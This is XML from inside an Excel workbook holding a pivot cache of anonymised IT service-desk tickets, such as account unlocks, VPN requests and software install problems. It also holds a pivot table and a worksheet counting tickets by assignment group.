    <s v="from: rakthyesh ramdntythanjesh _x000d__x000a_sent: friday, august 05, 2016 5:26 am_x000d__x000a_to: ugyothfz ugrmkdhx_x000d__x000a_cc: mikhghytr rhoades_x000d__x000a_subject: ticket_no1535917-no acces to paystub and etime._x000d__x000a__x000d__x000a_good morning safrgyynjit,_x000d__x000a__x000d__x000a_user called to service desk and requested to expedite the case, requesting you to own the issue on priority and assist user on same._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_kind "/>
    <s v="eqzibjhw ymebpoih"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook freezing because of crm addin"/>
    <s v="outlook freezing because of crm addin"/>
    <s v="crjhotyk pxslorbe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inquiry about employee- shesyhur posrt"/>
    <s v="inquiry about employee- shesyhur posrt"/>
    <s v="pvlxjizg xzvlwqjc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="etime- time card update information."/>
    <s v="etime- time card update information."/>
    <s v="tmopbken ibzougsd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="supply_chain_software account unlock and password reset"/>
    <s v="supply_chain_software account unlock and password reset"/>
    <s v="xjyuobma pzgqixlj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can't login to bex analyzer through vpn - urgent"/>
    <s v="_x000d__x000a__x000d__x000a_received from: cfzsajbe.lyejkdho@gmail.com_x000d__x000a__x000d__x000a_[cid:image001.jpg@01d1eee5.c90cdd40]_x000d__x000a__x000d__x000a_best "/>
    <s v="cfzsajbe lyejkdho"/>
    <x v="0"/>
  </r>
  <r>
    <s v="beenefits access on oneteam"/>
    <s v="_x000a__x000a_received from: bjitvswa.yrmugfnq@gmail.com_x000a__x000a_yesterday, it helped me access some additional information on oneteam.  but i still do not have a link showing for my benefits.  i tried to search and nothing pulls up._x000a__x000a_tgbtyim dgtalone_x000a_key account manager_x000a_bjitvswa.yrmugfnq@gmail.com&lt;mailto:beyklcmj.bgfmrltw@gmail.com&gt;_x000a_"/>
    <s v="bjitvswa yrmugfnq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to HostName_776"/>
    <s v="stehdgty jfhying called in for an issue where he and his supervisor was not able to connect to a network drive which is HostName_776._x000a_they're doing the third shift and as per stehdgty there's only two of them who are working but in another hour there would be 5-6 more people coming."/>
    <s v="byfskuni mhvnqodk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="customer group enhanced field"/>
    <s v="_x000d__x000a__x000d__x000a_received from: nlearzwi.ukdzstwi@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_a business decision has recently been made to view mfg_tooltion (customer classification ik) as indirect sales going forward. currently in the bex system they are classified as direct._x000d__x000a__x000d__x000a_can you please modify the &quot;cust grp 1 â€“ enhanced&quot; field (0cust_sales__zcustgrp1) to show mfg_tooltion (customer classification ik) customers as indirect._x000d__x000a_[cid:image001.png@01d1ee74.cc06a6a0]_x000d__x000a__x000d__x000a_this field is used in several bex and hana reports (sales v plan, product management, otc billings, etc). let me know if you have any questions._x000d__x000a__x000d__x000a_best "/>
    <s v="nlearzwi ukdzstwi"/>
    <x v="8"/>
  </r>
  <r>
    <s v="ess portal"/>
    <s v="_x000a__x000a_received from: eagvusbr.nguqityl@gmail.com_x000a__x000a_hi team,_x000a__x000a_i was going into the ess file and checking some things for the ytd and this is the screen that shows up.  this is on my report tab when i am logged into vpn.  please assist in getting this to english._x000a_[cid:image001.jpg@01d1ee74.0a355760]_x000a__x000a__x000a__x000a_eagvusbr nguqityl_x000a_sales engineer_x000a__x000a_"/>
    <s v="eagvusbr nguqityl"/>
    <x v="8"/>
  </r>
  <r>
    <s v="robot HostName_776 is inactive"/>
    <s v="robot HostName_776 is inactive"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="fw: case id [ref:_case-111121032:ref] :: others"/>
    <s v="from: pacvbetl yptglhoe _x000d__x000a_sent: thursday, august 04, 2016 10:59 pm_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: amar fw: case id [ref:_case-111121032:ref] :: others_x000d__x000a__x000d__x000a_please see the forwarded email below.   this looks suspicious to me and may be some sort of phishing or spamming email.  please review it and let me know if it looks legitimate and is from legitimate individuals at company.  i did not open or view any of the attachments.  _x000d__x000a__x000d__x000a_i have no idea why accounts payable would be sending me an email._x000d__x000a__x000d__x000a_best "/>
    <s v="pacvbetl yptglhoe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please remove user hugcadrn ixhlwdgt (ralfteimp) from palo alto quarantine"/>
    <s v="please remove user hugcadrn ixhlwdgt (ralfteimp) from palo alto quarantine. user's pc has been replaced"/>
    <s v="hugcadrn ixhlwdgt"/>
    <x v="19"/>
  </r>
  <r>
    <s v="ticket update on inc1538505 to user hbmwlprq ilfvyodx"/>
    <s v="ticket update on inc1538505 to user hbmwlprq ilfvyodx"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0427635"/>
    <s v="ticket update on ticket_no0427635"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="telephony_software is missing from pc"/>
    <s v="pc received multiple windows security updates earlier, and now the telephony_software software is missing from the screen._x000d__x000a_ran requirements check software to see that dotnet framdntyework 4.6.1 is installed on the pc._x000d__x000a_telephony_software fails to install in the absence of dotnet 4.5.2_x000d__x000a_used dotnet uninstaller to remove all versions, restarted pc, dotnet 4.5.2 still fails to install._x000d__x000a_ran a repair tool to see that the pc still has dot net 4.6.1 installed._x000d__x000a__x000d__x000a_need help to setup the compatible version of dotnet on the pc and help re install telephony_software 2016 r2_x000d__x000a__x000d__x000a_1.checked previous cases/tickets log(cptl) : y_x000d__x000a_2.contact number: 346 901 0696_x000d__x000a_3.pc name: lmsl9517233_x000d__x000a_4.os version: windows 8.1 64 bit_x000d__x000a_5.sop exists: y/n: n_x000d__x000a_6.steps followed: na_x000d__x000a_7.next assignment: amerirtcas pc services_x000d__x000a_8.reason for reassignment: need to downgrade dot net to 4.5.2 to install crm 2016 r2 client_x000d__x000a_9.cost center: na_x000d__x000a_"/>
    <s v="pvbomqht smfkuhwi"/>
    <x v="2"/>
  </r>
  <r>
    <s v="erp account unlock"/>
    <s v="name:mfeyouli ndobtzpw_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:mfeyouli.ndobtzpw@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:unlock erp account for gadbpfrz unvdyask user name :boivin"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked"/>
    <s v="account locked"/>
    <s v="sdvlxbfe ptnahjkw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="check status in purchasing"/>
    <s v="please contact ed pasgryowski (pasgryo) about his purchasing check status.  each time he tries to view his carts the view changes and he can't see his carts.  i told him to click in change query and the show my team carts box but it seems to reset each time."/>
    <s v="mpihysnw wrctgoan"/>
    <x v="29"/>
  </r>
  <r>
    <s v="vpn for laptop"/>
    <s v="_x000a__x000a_received from: jxgobwrm.qkugdipo@gmail.com_x000a__x000a_i need a vpn for my new laptop. name llv8517416_x000a__x000a_knethyen grechduy_x000a_engineer, product engineering_x000a_company_x000a_jxgobwrm.qkugdipo@gmail.com&lt;mailto:jxgobwrm.qkugdipo@gmail.com&gt;_x000a__x000a_"/>
    <s v="jxgobwrm qkugdipo"/>
    <x v="33"/>
  </r>
  <r>
    <s v="hr_tool etime option not visitble "/>
    <s v="hr_tool etime option not visitble "/>
    <s v="tmopbken ibzougsd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp fi  - ob09, two accounts to be added"/>
    <s v="i am sorry, i have another two accounts that need to be added: 21253264 and 21253268. please copy from 21253214.the problem is that the error only comes up if someone tries to clear open items for these accounts. _x000d__x000a__x000d__x000a_this incident has been created against to ticket_no1536494."/>
    <s v="ipwjorsc uboapexr"/>
    <x v="9"/>
  </r>
  <r>
    <s v="tablet needs reimaged due to multiple issues with crm wifi etc"/>
    <s v="tablet needs reimaged due to multiple issues with crm wifi etc"/>
    <s v="cpmaidhj elbaqmtp"/>
    <x v="2"/>
  </r>
  <r>
    <s v="emails not coming in from zz mail"/>
    <s v="_x000d__x000a__x000d__x000a_received from: avglmrts.vhqmtiua@gmail.com_x000d__x000a__x000d__x000a_good afternoon,_x000d__x000a_i am not receiving the emails that i sent from zz mail._x000d__x000a_please advise_x000d__x000a__x000d__x000a_"/>
    <s v="avglmrts vhqmtiua"/>
    <x v="29"/>
  </r>
  <r>
    <s v="telephony_software issue"/>
    <s v="telephony_software issue"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip2: windows password reset for tifpdchb pedxruyf"/>
    <s v="vip2: windows password reset for tifpdchb pedxruyf"/>
    <s v="oybwdsgx oxyhwrfz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="machine nÃ£o estÃ¡ funcionando"/>
    <s v="i am unable to access the machine utilities to finish the drawers adjustment settings._x000d__x000a_is no network.."/>
    <s v="ufawcgob aowhxjky"/>
    <x v="62"/>
  </r>
  <r>
    <s v="an mehreren pc`s lassen sich verschiedene prgramdntyme nicht Ã¶ffnen. "/>
    <s v="an mehreren pc`s lassen sich verschiedene prgramdntyme nicht Ã¶ffnen. bereich cnc."/>
    <s v="kqvbrspl jyzoklfx"/>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E72764-6135-4B65-BE37-9C099D6AEA37}"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8" firstHeaderRow="1" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="4">
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField axis="axisRow" dataField="1" showAll="0" sortType="descending">
      <items count="75">
        <item x="0"/>
        <item x="1"/>
        <item x="19"/>
        <item x="2"/>
        <item x="9"/>
        <item x="10"/>
        <item x="11"/>
        <item x="12"/>
        <item x="13"/>
        <item x="14"/>
        <item x="15"/>
        <item x="16"/>
        <item x="17"/>
        <item x="18"/>
        <item x="20"/>
        <item x="21"/>
        <item x="22"/>
        <item x="23"/>
        <item x="24"/>
        <item x="25"/>
        <item x="26"/>
        <item x="27"/>
        <item x="28"/>
        <item x="29"/>
        <item x="30"/>
        <item x="31"/>
        <item x="6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2"/>
        <item x="63"/>
        <item x="64"/>
        <item x="65"/>
        <item x="66"/>
        <item x="67"/>
        <item x="68"/>
        <item x="69"/>
        <item x="6"/>
        <item x="70"/>
        <item x="71"/>
        <item x="72"/>
        <item x="73"/>
        <item x="7"/>
        <item x="8"/>
        <item t="default"/>
      </items>
      <autoSortScope>
        <pivotArea dataOnly="0" outline="0" fieldPosition="0">
          <references count="1">
            <reference field="4294967294" count="1" selected="0">
              <x v="0"/>
            </reference>
          </references>
        </pivotArea>
      </autoSortScope>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="3"/>
  </rowFields>
  <rowItems count="75">
    <i>
      <x/>
    </i>
    <i>
      <x v="72"/>
    </i>
    <i>
      <x v="18"/>
    </i>
    <i>
      <x v="6"/>
    </i>
    <i>
      <x v="73"/>
    </i>
    <i>
      <x v="2"/>
    </i>
    <i>
      <x v="13"/>
    </i>
    <i>
      <x v="3"/>
    </i>
    <i>
      <x v="56"/>
    </i>
    <i>
      <x v="7"/>
    </i>
    <i>
      <x v="4"/>
    </i>
    <i>
      <x v="45"/>
    </i>
    <i>
      <x v="8"/>
    </i>
    <i>
      <x v="19"/>
    </i>
    <i>
      <x v="27"/>
    </i>
    <i>
      <x v="34"/>
    </i>
    <i>
      <x v="23"/>
    </i>
    <i>
      <x v="12"/>
    </i>
    <i>
      <x v="10"/>
    </i>
    <i>
      <x v="11"/>
    </i>
    <i>
      <x v="25"/>
    </i>
    <i>
      <x v="67"/>
    </i>
    <i>
      <x v="28"/>
    </i>
    <i>
      <x v="20"/>
    </i>
    <i>
      <x v="35"/>
    </i>
    <i>
      <x v="22"/>
    </i>
    <i>
      <x v="36"/>
    </i>
    <i>
      <x v="9"/>
    </i>
    <i>
      <x v="24"/>
    </i>
    <i>
      <x v="37"/>
    </i>
    <i>
      <x v="14"/>
    </i>
    <i>
      <x v="40"/>
    </i>
    <i>
      <x v="1"/>
    </i>
    <i>
      <x v="16"/>
    </i>
    <i>
      <x v="5"/>
    </i>
    <i>
      <x v="15"/>
    </i>
    <i>
      <x v="42"/>
    </i>
    <i>
      <x v="43"/>
    </i>
    <i>
      <x v="17"/>
    </i>
    <i>
      <x v="59"/>
    </i>
    <i>
      <x v="57"/>
    </i>
    <i>
      <x v="33"/>
    </i>
    <i>
      <x v="21"/>
    </i>
    <i>
      <x v="31"/>
    </i>
    <i>
      <x v="39"/>
    </i>
    <i>
      <x v="30"/>
    </i>
    <i>
      <x v="46"/>
    </i>
    <i>
      <x v="62"/>
    </i>
    <i>
      <x v="49"/>
    </i>
    <i>
      <x v="48"/>
    </i>
    <i>
      <x v="51"/>
    </i>
    <i>
      <x v="47"/>
    </i>
    <i>
      <x v="55"/>
    </i>
    <i>
      <x v="44"/>
    </i>
    <i>
      <x v="41"/>
    </i>
    <i>
      <x v="38"/>
    </i>
    <i>
      <x v="26"/>
    </i>
    <i>
      <x v="63"/>
    </i>
    <i>
      <x v="60"/>
    </i>
    <i>
      <x v="52"/>
    </i>
    <i>
      <x v="32"/>
    </i>
    <i>
      <x v="54"/>
    </i>
    <i>
      <x v="65"/>
    </i>
    <i>
      <x v="53"/>
    </i>
    <i>
      <x v="70"/>
    </i>
    <i>
      <x v="69"/>
    </i>
    <i>
      <x v="66"/>
    </i>
    <i>
      <x v="50"/>
    </i>
    <i>
      <x v="71"/>
    </i>
    <i>
      <x v="58"/>
    </i>
    <i>
      <x v="29"/>
    </i>
    <i>
      <x v="64"/>
    </i>
    <i>
      <x v="68"/>
    </i>
    <i>
      <x v="61"/>
    </i>
    <i t="grand">
      <x/>
    </i>
  </rowItems>
  <colItems count="1">
    <i/>
  </colItems>
  <dataFields count="1">
    <dataField name="Count of Assignment group"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DBC2-CBC1-4799-B417-45E6AD690185}">
  <dimension ref="A1:H78"/>
  <sheetViews>
    <sheetView topLeftCell="A36" workbookViewId="0">
      <selection activeCell="A54" sqref="A54"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="12.36328125" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="23.90625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" x14ac:dyDescent="0.35">
      <c r="H1" t="s">
        <v>15981</v>
      </c>
    </row>
    <row r="3" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A3" s="4" t="s">
        <v>15975</v>
      </c>
      <c r="B3" t="s">
        <v>15977</v>
      </c>
    </row>
    <row r="4" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A4" s="5" t="s">
        <v>5</v>
      </c>
      <c r="B4" s="6">
        <v>3976</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A5" s="5" t="s">
        <v>122</v>
      </c>
      <c r="B5" s="6">
        <v>661</v>
      </c>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A6" s="5" t="s">
        <v>511</v>
      </c>
      <c r="B6" s="6">
        <v>289</v>
      </c>
    </row>
    <row r="7" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A7" s="5" t="s">
        <v>232</v>
      </c>
      <c r="B7" s="6">
        <v>257</v>
      </c>
    </row>
    <row r="8" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A8" s="5" t="s">
        <v>166</v>
      </c>
      <c r="B8" s="6">
        <v>252</v>
      </c>
    </row>
    <row r="9" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A9" s="5" t="s">
        <v>414</v>
      </c>
      <c r="B9" s="6">
        <v>241</v>
      </c>
    </row>
    <row r="10" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A10" s="5" t="s">
        <v>405</v>
      </c>
      <c r="B10" s="6">
        <v>215</v>
      </c>
    </row>
    <row r="11" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A11" s="5" t="s">
        <v>44</v>
      </c>
      <c r="B11" s="6">
        <v>200</v>
      </c>
    </row>
    <row r="12" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A12" s="5" t="s">
        <v>112</v>
      </c>
      <c r="B12" s="6">
        <v>184</v>
      </c>
    </row>
    <row r="13" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A13" s="5" t="s">
        <v>266</v>
      </c>
      <c r="B13" s="6">
        <v>145</v>
      </c>
    </row>
    <row r="14" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A14" s="5" t="s">
        <v>186</v>
      </c>
      <c r="B14" s="6">
        <v>140</v>
      </c>
    </row>
    <row r="15" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A15" s="5" t="s">
        <v>103</v>
      </c>
      <c r="B15" s="6">
        <v>129</v>
      </c>
    </row>
    <row r="16" spans="1:8" x14ac:dyDescent="0.35">
      <c r="A16" s="5" t="s">
        <v>301</v>
      </c>
      <c r="B16" s="6">
        <v>118</v>
      </c>
    </row>
    <row r="17" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A17" s="5" t="s">
        <v>519</v>
      </c>
      <c r="B17" s="6">
        <v>116</v>
      </c>
    </row>
    <row r="18" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A18" s="5" t="s">
        <v>839</v>
      </c>
      <c r="B18" s="6">
        <v>107</v>
      </c>
    </row>
    <row r="19" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A19" s="5" t="s">
        <v>78</v>
      </c>
      <c r="B19" s="6">
        <v>100</v>
      </c>
    </row>
    <row r="20" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A20" s="5" t="s">
        <v>595</v>
      </c>
      <c r="B20" s="6">
        <v>97</v>
      </c>
    </row>
    <row r="21" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A21" s="5" t="s">
        <v>397</v>
      </c>
      <c r="B21" s="6">
        <v>88</v>
      </c>
    </row>
    <row r="22" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A22" s="5" t="s">
        <v>350</v>
      </c>
      <c r="B22" s="6">
        <v>85</v>
      </c>
    </row>
    <row r="23" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A23" s="5" t="s">
        <v>359</v>
      </c>
      <c r="B23" s="6">
        <v>81</v>
      </c>
    </row>
    <row r="24" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A24" s="5" t="s">
        <v>647</v>
      </c>
      <c r="B24" s="6">
        <v>69</v>
      </c>
    </row>
    <row r="25" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A25" s="5" t="s">
        <v>118</v>
      </c>
      <c r="B25" s="6">
        <v>68</v>
      </c>
    </row>
    <row r="26" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A26" s="5" t="s">
        <v>910</v>
      </c>
      <c r="B26" s="6">
        <v>62</v>
      </c>
    </row>
    <row r="27" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A27" s="5" t="s">
        <v>541</v>
      </c>
      <c r="B27" s="6">
        <v>56</v>
      </c>
    </row>
    <row r="28" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A28" s="5" t="s">
        <v>1160</v>
      </c>
      <c r="B28" s="6">
        <v>45</v>
      </c>
    </row>
    <row r="29" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A29" s="5" t="s">
        <v>587</v>
      </c>
      <c r="B29" s="6">
        <v>44</v>
      </c>
    </row>
    <row r="30" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A30" s="5" t="s">
        <v>1168</v>
      </c>
      <c r="B30" s="6">
        <v>40</v>
      </c>
    </row>
    <row r="31" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A31" s="5" t="s">
        <v>325</v>
      </c>
      <c r="B31" s="6">
        <v>39</v>
      </c>
    </row>
    <row r="32" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A32" s="5" t="s">
        <v>643</v>
      </c>
      <c r="B32" s="6">
        <v>39</v>
      </c>
    </row>
    <row r="33" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A33" s="5" t="s">
        <v>1318</v>
      </c>
      <c r="B33" s="6">
        <v>37</v>
      </c>
    </row>
    <row r="34" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A34" s="5" t="s">
        <v>430</v>
      </c>
      <c r="B34" s="6">
        <v>36</v>
      </c>
    </row>
    <row r="35" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A35" s="5" t="s">
        <v>1869</v>
      </c>
      <c r="B35" s="6">
        <v>35</v>
      </c>
    </row>
    <row r="36" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A36" s="5" t="s">
        <v>21</v>
      </c>
      <c r="B36" s="6">
        <v>31</v>
      </c>
    </row>
    <row r="37" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A37" s="5" t="s">
        <v>463</v>
      </c>
      <c r="B37" s="6">
        <v>31</v>
      </c>
    </row>
    <row r="38" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A38" s="5" t="s">
        <v>205</v>
      </c>
      <c r="B38" s="6">
        <v>30</v>
      </c>
    </row>
    <row r="39" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A39" s="5" t="s">
        <v>453</v>
      </c>
      <c r="B39" s="6">
        <v>29</v>
      </c>
    </row>
    <row r="40" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A40" s="5" t="s">
        <v>2083</v>
      </c>
      <c r="B40" s="6">
        <v>27</v>
      </c>
    </row>
    <row r="41" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A41" s="5" t="s">
        <v>2421</v>
      </c>
      <c r="B41" s="6">
        <v>25</v>
      </c>
    </row>
    <row r="42" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A42" s="5" t="s">
        <v>477</v>
      </c>
      <c r="B42" s="6">
        <v>25</v>
      </c>
    </row>
    <row r="43" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A43" s="5" t="s">
        <v>6489</v>
      </c>
      <c r="B43" s="6">
        <v>25</v>
      </c>
    </row>
    <row r="44" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A44" s="5" t="s">
        <v>6153</v>
      </c>
      <c r="B44" s="6">
        <v>20</v>
      </c>
    </row>
    <row r="45" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A45" s="5" t="s">
        <v>1094</v>
      </c>
      <c r="B45" s="6">
        <v>19</v>
      </c>
    </row>
    <row r="46" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A46" s="5" t="s">
        <v>569</v>
      </c>
      <c r="B46" s="6">
        <v>18</v>
      </c>
    </row>
    <row r="47" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A47" s="5" t="s">
        <v>1046</v>
      </c>
      <c r="B47" s="6">
        <v>16</v>
      </c>
    </row>
    <row r="48" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A48" s="5" t="s">
        <v>1460</v>
      </c>
      <c r="B48" s="6">
        <v>15</v>
      </c>
    </row>
    <row r="49" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A49" s="5" t="s">
        <v>980</v>
      </c>
      <c r="B49" s="6">
        <v>15</v>
      </c>
    </row>
    <row r="50" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A50" s="5" t="s">
        <v>2713</v>
      </c>
      <c r="B50" s="6">
        <v>14</v>
      </c>
    </row>
    <row r="51" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A51" s="5" t="s">
        <v>7775</v>
      </c>
      <c r="B51" s="6">
        <v>11</v>
      </c>
    </row>
    <row r="52" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A52" s="5" t="s">
        <v>3409</v>
      </c>
      <c r="B52" s="6">
        <v>11</v>
      </c>
    </row>
    <row r="53" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A53" s="5" t="s">
        <v>3399</v>
      </c>
      <c r="B53" s="6">
        <v>9</v>
      </c>
    </row>
    <row r="54" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A54" s="5" t="s">
        <v>3577</v>
      </c>
      <c r="B54" s="6">
        <v>8</v>
      </c>
    </row>
    <row r="55" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A55" s="5" t="s">
        <v>3198</v>
      </c>
      <c r="B55" s="6">
        <v>8</v>
      </c>
    </row>
    <row r="56" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A56" s="5" t="s">
        <v>4662</v>
      </c>
      <c r="B56" s="6">
        <v>6</v>
      </c>
    </row>
    <row r="57" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A57" s="5" t="s">
        <v>2541</v>
      </c>
      <c r="B57" s="6">
        <v>6</v>
      </c>
    </row>
    <row r="58" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A58" s="5" t="s">
        <v>1903</v>
      </c>
      <c r="B58" s="6">
        <v>6</v>
      </c>
    </row>
    <row r="59" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A59" s="5" t="s">
        <v>1444</v>
      </c>
      <c r="B59" s="6">
        <v>5</v>
      </c>
    </row>
    <row r="60" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A60" s="5" t="s">
        <v>6270</v>
      </c>
      <c r="B60" s="6">
        <v>4</v>
      </c>
    </row>
    <row r="61" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A61" s="5" t="s">
        <v>9367</v>
      </c>
      <c r="B61" s="6">
        <v>4</v>
      </c>
    </row>
    <row r="62" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A62" s="5" t="s">
        <v>7177</v>
      </c>
      <c r="B62" s="6">
        <v>3</v>
      </c>
    </row>
    <row r="63" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A63" s="5" t="s">
        <v>3808</v>
      </c>
      <c r="B63" s="6">
        <v>3</v>
      </c>
    </row>
    <row r="64" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A64" s="5" t="s">
        <v>1061</v>
      </c>
      <c r="B64" s="6">
        <v>3</v>
      </c>
    </row>
    <row r="65" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A65" s="5" t="s">
        <v>4457</v>
      </c>
      <c r="B65" s="6">
        <v>3</v>
      </c>
    </row>
    <row r="66" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A66" s="5" t="s">
        <v>11285</v>
      </c>
      <c r="B66" s="6">
        <v>3</v>
      </c>
    </row>
    <row r="67" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A67" s="5" t="s">
        <v>4056</v>
      </c>
      <c r="B67" s="6">
        <v>2</v>
      </c>
    </row>
    <row r="68" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A68" s="5" t="s">
        <v>14839</v>
      </c>
      <c r="B68" s="6">
        <v>2</v>
      </c>
    </row>
    <row r="69" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A69" s="5" t="s">
        <v>14424</v>
      </c>
      <c r="B69" s="6">
        <v>2</v>
      </c>
    </row>
    <row r="70" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A70" s="5" t="s">
        <v>11404</v>
      </c>
      <c r="B70" s="6">
        <v>2</v>
      </c>
    </row>
    <row r="71" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A71" s="5" t="s">
        <v>3563</v>
      </c>
      <c r="B71" s="6">
        <v>2</v>
      </c>
    </row>
    <row r="72" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A72" s="5" t="s">
        <v>15461</v>
      </c>
      <c r="B72" s="6">
        <v>1</v>
      </c>
    </row>
    <row r="73" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A73" s="5" t="s">
        <v>6257</v>
      </c>
      <c r="B73" s="6">
        <v>1</v>
      </c>
    </row>
    <row r="74" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A74" s="5" t="s">
        <v>924</v>
      </c>
      <c r="B74" s="6">
        <v>1</v>
      </c>
    </row>
    <row r="75" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A75" s="5" t="s">
        <v>10194</v>
      </c>
      <c r="B75" s="6">
        <v>1</v>
      </c>
    </row>
    <row r="76" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A76" s="5" t="s">
        <v>12368</v>
      </c>
      <c r="B76" s="6">
        <v>1</v>
      </c>
    </row>
    <row r="77" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A77" s="5" t="s">
        <v>7404</v>
      </c>
      <c r="B77" s="6">
        <v>1</v>
      </c>
    </row>
    <row r="78" spans="1:2" x14ac:dyDescent="0.35">
      <c r="A78" s="5" t="s">
        <v>15976</v>
      </c>
      <c r="B78" s="6">
        <v>8500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EC25D-A35A-49D7-A182-56C98F5400CA}">
  <sheetPr filterMode="1"/>
  <dimension ref="A1:D8501"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="B1" workbookViewId="0">
      <selection activeCell="B52" sqref="B52"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.90625" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="52.54296875" style="2" customWidth="1"/>
    <col min="2" max="2" width="255.6328125" style="2" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="26.1796875" style="2" bestFit="1" customWidth="1"/>
    <col min="4" max="16384" width="8.90625" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4" x14ac:dyDescent="0.35">
      <c r="A1" s="2" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="2" t="s">
        <v>15974</v>
      </c>
      <c r="D1" s="2" t="s">
        <v>2</v>
      </c>
